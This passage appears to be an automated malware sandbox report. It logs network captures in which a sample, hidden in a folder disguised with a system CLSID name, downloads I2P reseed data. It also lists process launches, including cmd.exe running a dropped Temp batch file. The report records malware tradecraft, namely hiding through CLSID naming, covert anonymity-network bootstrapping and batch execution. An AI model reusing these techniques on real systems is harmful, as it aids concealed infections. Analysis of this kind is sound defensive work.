                                                    Data Ascii: Wz;ErouterInfo-MkVIfkgL~lhU-mFUzE7IRISkmVuOSwbjR-ctf~cuMM0=.datUTgPKUdJY_%;routerInfo-5CgOJHOIBGQ~Gtl1Yarjo7NXbqglrVEbFgVdAI1MslQ=.datUTgPKnJYg;


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.650004144.172.118.1544435164C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-12 18:31:26 UTC108OUTGET https://reseed.stormycloud.org:443/i2pseeds.su3 HTTP/1.0
                                                    User-Agent: Wget/1.11.4
                                                    Connection: close
                                                    2024-10-12 18:31:26 UTC247INData Raw: 48 54 54 50 2f 31 2e 30 20 32 30 30 20 4f 4b 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 69 32 70 73 65 65 64 73 2e 73 75 33 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 38 32 39 30 36 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 6c 69 6d 69 74 3a 20 34 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 6d 61 69 6e 69 6e 67 3a 20 33 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 73 65 74 3a 20 39 30 30 0d 0a 64 61 74 65 3a 20 53 61 74 2c 20 31 32 20 4f 63 74 20 32 30 32 34 20 31 38 3a 33 31 3a 32 36 20 47 4d 54 0d 0a 0d 0a
                                                    Data Ascii: HTTP/1.0 200 OKcontent-disposition: attachment; filename=i2pseeds.su3content-length: 82906content-type: application/octet-streamx-ratelimit-limit: 4x-ratelimit-remaining: 3x-ratelimit-reset: 900date: Sat, 12 Oct 2024 18:31:26 GMT
                                                    2024-10-12 18:31:26 UTC14050INData Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 15 00 00 00 00 00 01 41 8d 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 32 38 37 35 31 35 30 31 00 00 00 00 00 00 61 64 6d 69 6e 40 73 74 6f 72 6d 79 63 6c 6f 75 64 2e 6f 72 67 50 4b 03 04 14 00 08 08 08 00 e4 bc 4b 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 55 30 66 37 44 49 61 69 67 67 72 38 67 65 2d 58 49 4e 78 34 4d 33 77 55 42 61 46 66 31 47 4f 68 47 32 78 43 43 75 49 53 7e 66 45 3d 2e 64 61 74 55 54 05 00 01 1c b7 09 67 fa 2e ef 24 fb 3a e2 b5 4d ef 35 1d f1 de 6d 72 45 e7 8c e5 9a ba 8b 77 4a 88 39 2f e1 dc fa 67 61 ba 4b 9a 3f f3 a2 ac 1d 3b 9d 76 7c be b9 ea 72 e3 9e 2e 6d b1 f4 14 ff 88 9f c1 55 ff 75 df 34 cf c9 19 95 c7 2f 6f 7f 85 67 d5 72 eb 5b 87
                                                    Data Ascii: I2Psu3A1728751501admin@stormycloud.orgPKKY;routerInfo-U0f7DIaiggr8ge-XINx4M3wUBaFf1GOhG2xCCuIS~fE=.datUTg.$:M5mrEwJ9/gaK?;v|r.mUu4/ogr[
                                                    2024-10-12 18:31:26 UTC2920INData Raw: 6a 19 96 99 6f 98 99 5d 6c 6b cd 58 66 cb 68 64 8d ee 10 07 96 e4 c4 82 62 5b 46 33 72 0d e4 80 19 c8 12 1c 1c 6a c4 30 0d 62 1e 93 93 b3 35 6e 2f ea 38 39 9b e6 67 97 b8 39 07 25 87 3a 97 ba 05 9a fb a5 9b 85 06 a5 16 9b 66 1a 7a 57 16 79 3a 1b d4 19 99 b8 1a 17 d5 45 f9 9b 26 63 f1 b6 a7 6e 56 52 a5 73 50 69 6a 9d 69 61 a6 a5 73 98 6f 98 4f 66 45 46 a2 45 a6 57 9d 73 70 46 9a bb 51 7e 45 92 99 a7 8b ae af 73 32 0e 57 16 22 7c 4d aa 6b c8 74 00 03 83 2e c4 4e e6 80 20 57 6b d6 bc d4 12 cf 14 90 38 5f 51 7e 69 49 6a 91 5e 59 6a 51 71 66 7e 9e 2d 9b 81 9e a5 9e 99 b1 f5 87 c3 5b af 66 d6 d8 cc 48 fc f2 5d 7b a5 ea cd 1b 06 e2 3e 77 3f 56 7c 2f 98 f8 3c ff c8 2f e1 75 7b a5 9d c3 e7 4d 9b 27 20 28 f7 6c cf af 09 97 73 dd d4 ac b6 e6 56 2f 09 e9 d9 5a f2 3e
                                                    Data Ascii: jo]lkXfhdb[F3rj0b5n/89g9%:fzWy:E&cnVRsPijiasoOfEFEWspFQ~Es2W"|Mkt.N Wk8_Q~iIj^YjQqf~-[fH]{>w?V|/</u{M' (lsV/Z>
                                                    2024-10-12 18:31:26 UTC2920INData Raw: 94 b2 64 e4 17 97 d8 f2 18 1a 58 ea 19 9a 99 ea 19 e8 59 5a 58 33 66 da 4a 04 e5 bb e4 84 7b 15 9b 55 85 a7 79 7b 18 25 87 78 18 a5 07 55 05 da da 5a b3 14 e4 17 95 d8 b2 1a 99 1a 19 1b 58 33 16 db ea b8 7b 25 a7 39 59 64 65 78 25 1b fa 94 17 46 95 e4 7b 14 7a 57 ea fa f9 59 f8 98 55 84 1b a6 98 96 07 96 ba 26 66 18 97 17 38 3a da 5a 33 96 d9 32 1a 59 73 c0 5c c1 12 1c 1c 6a c4 30 99 25 39 b1 a0 d8 96 c9 c9 d9 1a 87 73 74 52 2a 92 4d 4d 23 83 43 b3 22 fc bc 0a b2 42 f3 75 8d c3 7d 4c 4b c3 dc 2c dc 42 52 9d f3 d2 ab 7c 8c 02 3c 4b fc fd 5d 4d 43 4d b0 38 31 d8 cb 22 28 29 22 29 d5 25 ad c8 dd b7 28 23 a7 4a 37 3b 33 c3 a9 3c d5 3b d2 2c ac d8 a8 2e d8 d0 bf 22 23 ab b2 3c ac 24 dd 13 e6 44 06 86 64 88 ab 58 fc d3 82 5c ad 59 f3 52 4b 3c 53 40 12 22 79 a9
                                                    Data Ascii: dXYZX3fJ{Uy{%xUZX3{%9Ydex%F{zWYU&f8:Z32Ys\j0%9stR*MM#C"Bu}LK,BR|<K]MCM81"()")%(#J7;3<;,."#<$DdX\YRK<S@"y
                                                    2024-10-12 18:31:26 UTC2920INData Raw: 0e df 6f c3 77 1e 3e a9 e6 ac 72 67 5e cf e5 cf 58 72 47 20 e6 c8 ac 09 e9 0a 49 f6 a3 f2 f8 e5 4d 53 13 b4 f7 72 26 f8 2c d8 a4 da f6 70 c9 c1 ae 12 e3 0a 5d 59 a7 49 6b 37 34 05 56 b6 ec 4e dd ce ca c0 c2 c0 ce c0 c2 c0 c0 38 a9 fe cb f3 6e 26 66 06 28 60 f5 0b 71 0e 30 62 28 65 c9 c8 2f 2e b1 e5 31 d2 33 34 37 d7 33 37 d0 33 34 33 b2 66 cc b4 95 f0 f4 f2 31 b4 4c 76 34 71 cc f0 70 77 4c 74 a9 f3 0d 2f c9 d3 0d b4 b5 b5 66 29 c8 2f 2a b1 65 35 b2 30 30 33 b3 66 2c b6 d5 09 ce 2f 8c 4c f5 37 74 74 ae cb 77 73 2c 76 77 77 a9 0a c9 29 f5 d7 0d 2f ae 72 4c 4e ac 32 b3 88 aa f3 35 f3 cb 2c 37 0d 74 8b b4 b5 66 2c b3 65 34 b2 e6 80 b9 82 25 38 38 d4 88 61 32 4b 72 62 41 b1 2d 93 93 b3 35 0e e7 e8 98 96 1b 05 1a 05 87 9a 16 fb bb 45 59 fa 65 99 16 78 fa 96 b8
                                                    Data Ascii: ow>rg^XrG IMSr&,p]YIk74VN8n&f(`q0b(e/.134737343f1Lv4qpwLt/f)/*e5003f,/L7ttws,vww)/rLN25,7tf,e4%88a2KrbA-5EYex
                                                    2024-10-12 18:31:26 UTC2920INData Raw: 32 dd d7 31 c0 34 d7 a0 34 aa 28 ab ce b8 d2 3f b9 b0 cc 3f bd ca cd d1 d6 9a b1 cc 96 d1 c8 9a 03 e6 0e 96 e0 e0 50 23 86 a9 2c c9 89 05 c5 b6 4c 4e ce d6 38 1d a4 53 64 19 60 99 ee 1c 52 e4 16 90 e6 16 12 11 5a 9e 92 e5 67 12 1e 68 12 e2 18 15 9c 6e ea 59 94 1b ec 61 56 a2 1b e2 ec 9e 5d 62 81 c5 91 5e 2e 65 25 e6 89 69 ee 1e ae e5 41 d9 a6 55 6e be 95 41 c6 c5 86 96 fe ae 51 49 01 5e 75 9e 45 16 95 81 19 a5 6e 95 5e 96 2e 9e 30 47 32 30 e8 40 dd 15 11 64 cd 9a 97 5a e2 99 02 12 e6 2b ca 2f 2d 49 2d d2 2b 4b 2d 2a ce cc cf b3 65 33 d0 b3 d4 33 33 b1 be f3 67 53 f9 73 0f 31 96 ee 6b 87 bc be e5 ab bb ff c9 34 ae 3a 63 7d f0 df 4b a7 cf 47 8b 59 4f cf f7 78 ff 63 35 ab 9f fd f5 4f 49 cb 1d d8 1f b7 cd e4 4c ce cd ae b8 de fe 55 fd f5 bd 0b 9c 57 ed f8 00
                                                    Data Ascii: 2144(??P#,LN8Sd`RZghnYaV]b^.e%iAUnAQI^uEn^.0G20@dZ+/-I-+K-*e333gSs1k4:c}KGYOxc5OILUW
                                                    2024-10-12 18:31:26 UTC2920INData Raw: 71 66 7e 9e 2d 9b 81 9e a5 9e 99 b1 75 44 d1 a5 fd ff bc 76 3d 3f 25 b3 7a 85 db a2 bc a6 a9 9a f7 b7 08 0b d4 79 95 e9 76 2c ea 2c b5 f6 2f 0c 31 fd f1 7f 95 7d 90 fd cb bf aa 17 66 5e e3 99 e5 6e 70 49 b3 35 31 ac a3 f1 f6 e2 95 1c e7 18 00 01 00 00 ff ff 50 4b 07 08 d6 12 c6 29 df 01 00 00 28 03 00 00 50 4b 03 04 14 00 08 00 08 00 f4 83 4c 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 6d 48 62 54 42 42 57 36 6c 62 70 43 43 77 37 4d 59 4d 62 41 48 6d 47 44 64 61 7a 57 79 6a 55 76 30 74 72 37 6d 62 6f 4b 49 65 41 3d 2e 64 61 74 55 54 05 00 01 6c a4 0a 67 d2 ab 6b b6 98 df 68 bb 77 ee e7 88 0b 3b a5 99 5b 5e 2b 19 f2 c8 87 6b 28 f1 07 bc df f9 c9 cc 5c 84 95 eb a5 e3 af b7 dc e7 57 ed 4a 5c f2 65 4a c6 7c e6 94 ab 5b
                                                    Data Ascii: qf~-uDv=?%zyv,,/1}f^npI51PK)(PKLY;routerInfo-mHbTBBW6lbpCCw7MYMbAHmGDdazWyjUv0tr7mboKIeA=.datUTlgkhw;[^+k(\WJ\eJ|[
                                                    2024-10-12 18:31:26 UTC2920INData Raw: 70 30 6e 69 75 66 5a 33 53 74 57 65 55 3d 2e 64 61 74 55 54 05 00 01 b4 76 0a 67 fa 7f 6c 5a bf b7 61 f5 ad 6b 01 12 bd a7 57 ec 7f d1 6b c3 ee 17 cd b8 a5 29 35 f4 62 83 d2 8a 59 2a 39 bb 52 ef 84 a6 70 6e 2a 38 e6 74 a6 e9 71 47 d8 cc c4 0b e7 4e be 3c e9 f4 fe e5 aa 9b a1 7f ab 3e 8c ca e3 97 97 af de 74 da e9 f5 31 f5 97 f6 5b a7 78 7b fe 7e 74 29 28 f1 7d ef ad 50 5f 95 d5 ca cb df ee da 37 9b 95 81 85 81 9d 81 85 81 81 71 52 c3 fd f5 13 58 98 19 a0 80 d5 2f c4 39 c0 88 a1 9c 25 23 bf b8 c4 96 cf d0 d4 50 cf c8 c4 40 cf d0 48 cf d0 c2 c4 9a 31 d3 56 c2 22 c7 d1 b7 b0 2c c8 b3 bc 28 2d 37 cd 37 3b 3d b8 2a d9 39 c3 d1 d6 d6 9a a5 20 bf a8 c4 96 d5 c8 d0 d0 c8 c8 9a b1 d8 56 c7 d9 cc c2 33 c8 df 32 d2 3b af 34 3c a5 b0 ce 22 bf 2a 2c cc 24 43 37 d5 38
                                                    Data Ascii: p0niufZ3StWeU=.datUTvglZakWk)5bY*9Rpn*8tqGN<>t1[x{~t)(}P_7qRX/9%#P@H1V",(-77;=*9 V32;4<"*,$C78
                                                    2024-10-12 18:31:26 UTC2920INData Raw: 74 83 dc b0 f4 b0 fc c4 60 c7 48 0b e3 50 bf e4 f2 28 9f aa 3c d3 0c 67 97 aa 48 63 af a0 b2 fc cc c8 54 0b 97 88 14 af 88 b2 7c 5b 6b 96 82 fc a2 12 5b 16 43 63 63 73 6b c6 62 5b 9d 6c f7 dc a8 80 c4 a4 4c af b4 d0 ba a0 54 17 f7 0a bf 28 03 cb 44 c7 cc 1c b7 cc 80 c2 dc 8a a0 f2 d4 ec 40 b3 52 e7 d2 c0 bc 64 5b 6b c6 32 5b 46 23 6b 56 54 f7 4e 41 77 2f 9f a1 91 a5 9e a1 a9 a1 9e 91 81 a5 9e 89 f9 80 b8 91 0b e6 46 56 bf 10 e7 00 23 86 32 9c 4e 93 70 c9 36 4b 74 4e cf 28 2b b2 28 f2 75 0a b7 cc 4f 0b 0c 49 2d 2e b7 c5 74 86 61 7a 4a 51 a6 79 45 64 44 60 94 61 9d ab 49 a5 61 b6 77 9a 67 60 59 aa 47 9e 8f 71 65 62 44 91 a3 b7 49 48 ae 8b b3 a1 63 b0 2b 2e 67 34 11 15 a3 34 75 12 03 23 17 24 c2 98 23 82 5c ac d9 d2 12 73 33 73 2a 6d 59 13 73 4a 8a 12 ad b9
                                                    Data Ascii: t`HP(<gHcT|[k[Cccskb[lLT(D@Rd[k2[F#kVTNAw/FV#2Np6KtN(+(uOI-.tazJQyEdD`aIawg`YGqebDIHc+.g44u#$#\s3s*mYsJ
                                                    2024-10-12 18:31:26 UTC2920INData Raw: ca 52 8b 8a 33 f3 f3 6c d9 0c f4 2c f5 cc 8c ad b7 29 ae ff 22 ab 24 e2 22 f0 b2 2e d5 ab ea d9 9b aa 7d df b4 aa b7 fd 7c e2 73 e9 59 9d 68 93 6f 94 81 d3 1f eb c9 6f 0d bc 63 db 57 9e ea be 27 9a 64 62 bf e7 4f bc a5 ef e4 73 bd ff cf f1 df 4b e0 07 04 00 00 ff ff 50 4b 07 08 32 24 34 01 f5 01 00 00 01 04 00 00 50 4b 03 04 14 00 08 00 08 00 08 7f 4c 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 6e 6d 53 34 74 62 67 67 69 4c 43 72 6b 4b 58 48 72 78 4d 5a 45 51 4b 67 48 69 4e 72 57 53 32 63 5a 52 68 2d 2d 46 30 50 66 61 30 3d 2e 64 61 74 55 54 05 00 01 20 9c 0a 67 3a fa 5e fe 2e 57 5f c9 6e f3 8b f9 13 55 43 94 44 27 6d f8 19 f5 ce 62 e5 b3 3f 5f dd fc 5c ef c7 85 1c 71 4a 98 2a b0 b0 c8 7d a3 13 f7 62 11 7e 9d 29 8e
                                                    Data Ascii: R3l,)"$".}|sYhoocW'dbOsKPK2$4PKLY;routerInfo-nmS4tbggiLCrkKXHrxMZEQKgHiNrWS2cZRh--F0Pfa0=.datUT g:^.W_nUCD'mb?_\qJ*}b~)


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    2192.168.2.650016144.172.118.154443
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-12 18:32:05 UTC108OUTGET https://reseed.stormycloud.org:443/i2pseeds.su3 HTTP/1.0
                                                    User-Agent: Wget/1.11.4
                                                    Connection: close
                                                    2024-10-12 18:32:05 UTC247INData Raw: 48 54 54 50 2f 31 2e 30 20 32 30 30 20 4f 4b 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 69 32 70 73 65 65 64 73 2e 73 75 33 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 38 36 30 38 31 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 6c 69 6d 69 74 3a 20 34 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 6d 61 69 6e 69 6e 67 3a 20 33 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 73 65 74 3a 20 39 30 30 0d 0a 64 61 74 65 3a 20 53 61 74 2c 20 31 32 20 4f 63 74 20 32 30 32 34 20 31 38 3a 30 36 3a 30 35 20 47 4d 54 0d 0a 0d 0a
                                                    Data Ascii: HTTP/1.0 200 OKcontent-disposition: attachment; filename=i2pseeds.su3content-length: 86081content-type: application/octet-streamx-ratelimit-limit: 4x-ratelimit-remaining: 3x-ratelimit-reset: 900date: Sat, 12 Oct 2024 18:06:05 GMT
                                                    2024-10-12 18:32:05 UTC11130INData Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 15 00 00 00 00 00 01 4d f4 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 32 38 37 34 39 37 30 33 00 00 00 00 00 00 61 64 6d 69 6e 40 73 74 6f 72 6d 79 63 6c 6f 75 64 2e 6f 72 67 50 4b 03 04 14 00 08 00 08 00 08 39 4a 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 45 30 44 65 4b 4e 55 4a 6e 63 79 4f 70 7a 2d 65 37 49 66 66 7a 41 6b 51 59 34 51 48 50 4c 42 71 75 4f 4b 47 4f 74 48 77 51 42 55 3d 2e 64 61 74 55 54 05 00 01 61 7d 07 67 d2 e0 fa b3 f0 64 a3 56 cb 8d dd bb 42 13 de 77 f6 af 49 be a4 7b a1 55 94 f3 f5 b5 65 a6 8f bf f4 4b 54 1e e5 f8 58 db 21 fe f3 cf 8c 6b c2 e5 31 2b 9e 18 17 da 96 cf db d0 e3 e6 ec 77 c0 6d 9a 16 57 ee a8 3c 7e 79 99 4f 46 75 73 d3 b7 de
                                                    Data Ascii: I2Psu3M1728749703admin@stormycloud.orgPK9JY;routerInfo-E0DeKNUJncyOpz-e7IffzAkQY4QHPLBquOKGOtHwQBU=.datUTa}gdVBwI{UeKTX!k1+wmW<~yOFus
                                                    2024-10-12 18:32:05 UTC16320INData Raw: 32 ca 31 d4 0d 4b b1 b0 b5 66 cd 4c ad 28 30 b0 e5 32 34 37 b2 30 35 31 b3 b4 b4 80 08 19 62 0a 19 c1 84 cc 4d 8c 8c ad 99 33 33 0c 6c 75 02 02 4a 0c 23 0d c2 9d dc 2c 02 0a dd 0a 23 8c 2b cd cd cb 32 92 7c 2c 8b 2c 8a 0d 8d 8c 73 c2 75 ab fc bc f3 7d f2 9d 13 7d f3 6d 41 5a 0c 6d 75 8a 2d 22 32 bd 82 7d cd 0a cc 12 d3 7d 0d 4d 4a 4b f2 d3 0d 53 03 c2 bc 33 a3 7c 75 f3 b3 3c b3 0d d3 4a 0d 3c 22 d3 5c 4a 9d 3c c1 5a 8c 6c 75 0c 52 52 4d c2 02 9d 72 bd b2 dc fd fc f2 22 fd 73 33 8d 33 23 7d 4c d2 bd 0a 22 cc b3 9d 43 83 9c 3c 0c 02 aa d2 82 2b 5c f2 23 41 3e 2a 49 4c 07 f9 c8 d8 d8 dc d2 d4 dc c0 d2 0c 22 04 f2 91 85 a1 85 85 b1 a1 99 91 31 44 c8 c8 96 d3 cc d2 cc d0 c8 d8 d8 c0 00 1c 17 75 26 b9 61 99 16 ce c9 85 e5 41 15 c5 16 be 9e ae 85 05 a1 81 a6 c9
                                                    Data Ascii: 21KfL(0247051bM33luJ#,#+2|,,su}}mAZmu-"2}}MJKS3|u<J<"\J<ZluRRMr"s33#}L"C<+\#A>*IL"1Du&aA
                                                    2024-10-12 18:32:05 UTC16320INData Raw: 99 2f dc 51 ae c7 9f ef 5f 3b ff f7 2b 3f bd ac 5e f8 31 f9 e1 1f 02 77 1f 3e f6 db 0f 97 9f ba f9 e7 a5 75 45 8a ff 13 00 00 ff ff 50 4b 07 08 3e 6d 2f 6c fe 02 00 00 8d 04 00 00 50 4b 03 04 14 00 08 00 08 00 70 3c 4a 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 58 52 2d 52 75 73 4b 66 4c 6f 6b 46 6d 62 4c 54 4b 41 30 6c 54 6e 44 64 4a 61 45 71 34 34 67 72 70 31 63 72 66 4c 59 43 65 36 45 3d 2e 64 61 74 55 54 05 00 01 c5 83 07 67 5a 27 b3 51 cf 25 6c 6d 8f d4 11 3b 3b d7 6b e6 5b bd 8c 17 70 1c b4 f3 8a 39 10 75 34 6e 93 43 ad c7 34 89 94 94 e8 7f 4b 4f be bc 76 e3 fb f2 6e eb ef d7 1f 2d e9 7c 38 cd 67 95 66 db 9e cf 37 75 2d 23 47 e5 f1 cb 2b cf 77 5b b6 32 eb c8 8d 02 e1 47 c1 99 6d 2b 79 82 ac 7e 48 b3 09 2f fb
                                                    Data Ascii: /Q_;+?^1w>uEPK>m/lPKp<JY;routerInfo-XR-RusKfLokFmbLTKA0lTnDdJaEq44grp1crfLYCe6E=.datUTgZ'Q%lm;;k[p9u4nC4KOvn-|8gf7u-#G+w[2Gm+y~H/
                                                    2024-10-12 18:32:05 UTC11160INData Raw: dd 14 9f 14 0b 2c 6e 2c 0e 4c ae c8 2a c9 0b c8 73 75 f6 0d 2e 4f 09 aa f0 0c cd af 8c f4 29 2f 72 49 49 2f 70 8f 0c ac 73 cf 35 4f 31 71 0f c9 76 83 bb 91 81 41 07 ea ac 80 20 6b d6 bc d4 12 cf 14 90 30 5f 51 7e 69 49 6a 91 5e 59 6a 51 71 66 7e 9e 2d 9b 81 9e a5 9e 99 b1 f5 59 9b 56 c3 c9 ec 87 7f 95 15 a6 bb c7 1e 59 14 a6 f3 62 5a 8f bc dc ca f5 bf 34 ce e7 30 56 6d 55 8d e7 53 7d bc f6 98 de 02 b5 a9 af c3 3e 2f ab 58 90 e1 7c 3d 55 e8 ec c3 9b 9e d9 31 4f d9 c3 4e b0 03 02 00 00 ff ff 50 4b 07 08 03 6a c7 55 de 01 00 00 2a 03 00 00 50 4b 03 04 14 00 08 08 08 00 11 3c 4a 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 33 79 51 54 4e 61 35 6d 69 61 30 39 7a 4c 4a 41 5a 54 47 62 4b 62 53 7a 33 63 49 59 7e 38 39 7e 47
                                                    Data Ascii: ,n,L*su.O)/rII/ps5O1qvA k0_Q~iIj^YjQqf~-YVYbZ40VmUS}>/X|=U1ONPKjU*PK<JY;routerInfo-3yQTNa5mia09zLJAZTGbKbSz3cIY~89~G
                                                    2024-10-12 18:32:05 UTC10220INData Raw: 38 4e 6f 36 6d 4c 55 61 43 75 77 4a 36 46 2d 32 4d 46 77 6b 51 64 51 66 4d 5a 56 6c 6f 6c 76 74 64 4f 6d 35 51 51 37 38 51 3d 2e 64 61 74 55 54 05 00 01 04 86 07 67 01 00 00 ff ff 50 4b 07 08 00 00 00 00 05 00 00 00 00 00 00 00 50 4b 03 04 14 00 08 00 08 00 33 3e 4a 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 63 36 7a 50 50 62 4b 69 53 2d 47 43 35 2d 31 45 69 35 57 5a 48 47 72 59 39 49 6a 67 6c 6f 6b 6d 36 30 6f 61 45 75 4b 52 32 68 73 3d 2e 64 61 74 55 54 05 00 01 12 87 07 67 ec d1 cd 6b 13 69 1c 07 f0 c9 36 69 b7 85 ed 6e 77 61 f7 d4 5d e8 61 2f 9b b4 cf cc 33 6f 61 76 d0 c4 8c cd 9b c9 64 26 69 5e 04 e3 34 93 26 93 64 f2 36 79 57 42 3d 58 85 1e 0a d5 43 03 be 80 07 6d 0f 96 ea cd 16 a4 42 a9 67 ab 22 f4 22 e6 20
                                                    Data Ascii: 8No6mLUaCuwJ6F-2MFwkQdQfMZVlolvtdOm5QQ78Q=.datUTgPKPK3>JY;routerInfo-c6zPPbKiS-GC5-1Ei5WZHGrY9Ijglokm60oaEuKR2hs=.datUTgki6inwa]a/3oavd&i^4&d6yWB=XCmBg""
                                                    2024-10-12 18:32:05 UTC14600INData Raw: 4b 03 04 14 00 08 00 08 00 62 3d 4a 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 63 38 6a 34 46 5a 79 47 45 57 34 75 75 30 52 52 57 53 63 2d 56 52 68 64 53 58 43 5a 71 63 66 73 79 30 69 48 68 45 35 6a 75 79 73 3d 2e 64 61 74 55 54 05 00 01 88 85 07 67 9a 27 34 e7 8d a4 d4 0d 8b 22 0f 3e fd 89 22 2a 72 1f 9f 6d 0d d7 7a e5 9d b9 de fa 48 f0 87 ed 1b 19 cd 6d f8 d7 cb c8 3c 8b b7 6d 7d ea a7 7d 51 8a 23 ea de 63 b6 ab cc ac d5 b1 32 ab 7f 9f bd 26 6c 3a 2a 8f 5f fe 4d e4 ff 27 97 ff 9e f1 e2 cb e2 6e 9f 7a 4c 39 68 d3 b5 37 97 76 ad 9d d6 95 78 e6 a9 07 c3 f9 88 c5 ac 0c 2c 0c ec 0c 2c 0c 0c 8c 93 4a 13 e7 fe 60 62 66 80 02 56 bf 10 e7 00 23 86 52 96 8c fc e2 12 5b 5e 4b 43 3d 23 63 23 3d 23 23 53 3d 13 53 6b c6 4c 5b
                                                    Data Ascii: Kb=JY;routerInfo-c8j4FZyGEW4uu0RRWSc-VRhdSXCZqcfsy0iHhE5juys=.datUTg'4">"*rmzHm<m}}Q#c2&l:*_M'nzL9h7vx,,J`bfV#R[^KC=#c#=##S=SkL[
                                                    2024-10-12 18:32:05 UTC6331INData Raw: 37 af e2 0c 02 00 00 61 03 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 be 92 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 38 30 7a 55 32 59 54 39 49 57 65 50 47 77 5a 58 42 32 44 76 50 41 76 32 57 59 41 66 4c 59 73 6d 38 6c 35 34 41 69 56 30 35 44 59 3d 2e 64 61 74 55 54 05 00 01 70 85 07 67 50 4b 01 02 14 00 14 00 08 08 08 00 f1 38 4a 59 ae 09 d9 5d 07 04 00 00 09 05 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 3c 95 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 6d 7a 4a 74 43 48 55 4e 6a 43 33 4b 49 66 31 50 46 66 33 63 74 33 51 54 4e 53 55 69 4c 38 30 57 33 6e 7e 75 6a 75 34 52 32 49 49 3d 2e 64 61 74 55 54 05 00 01 37 7d 07 67 50 4b 01 02 14 00 14 00 08 08 08 00 ad 39 4a 59 7b 66 4b 95 26 02 00 00 94 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 b5 99
                                                    Data Ascii: 7a;routerInfo-80zU2YT9IWePGwZXB2DvPAv2WYAfLYsm8l54AiV05DY=.datUTpgPK8JY];<routerInfo-mzJtCHUNjC3KIf1PFf3ct3QTNSUiL80W3n~uju4R2II=.datUT7}gPK9JY{fK&;


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:14:29:59
                                                    Start date:12/10/2024
                                                    Path:C:\Users\user\Desktop\file.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                    Imagebase:0x400000
                                                    File size:5'654'528 bytes
                                                    MD5 hash:D2ECF5F2A271DA094867F6DC31B3D60E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:14:29:59
                                                    Start date:12/10/2024
                                                    Path:C:\Users\user\Desktop\file.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Desktop\file.exe
                                                    Imagebase:0x400000
                                                    File size:5'654'528 bytes
                                                    MD5 hash:D2ECF5F2A271DA094867F6DC31B3D60E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Borland Delphi
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:3
                                                    Start time:14:30:02
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat"
                                                    Imagebase:0x7ff76ac70000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:14:30:02
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
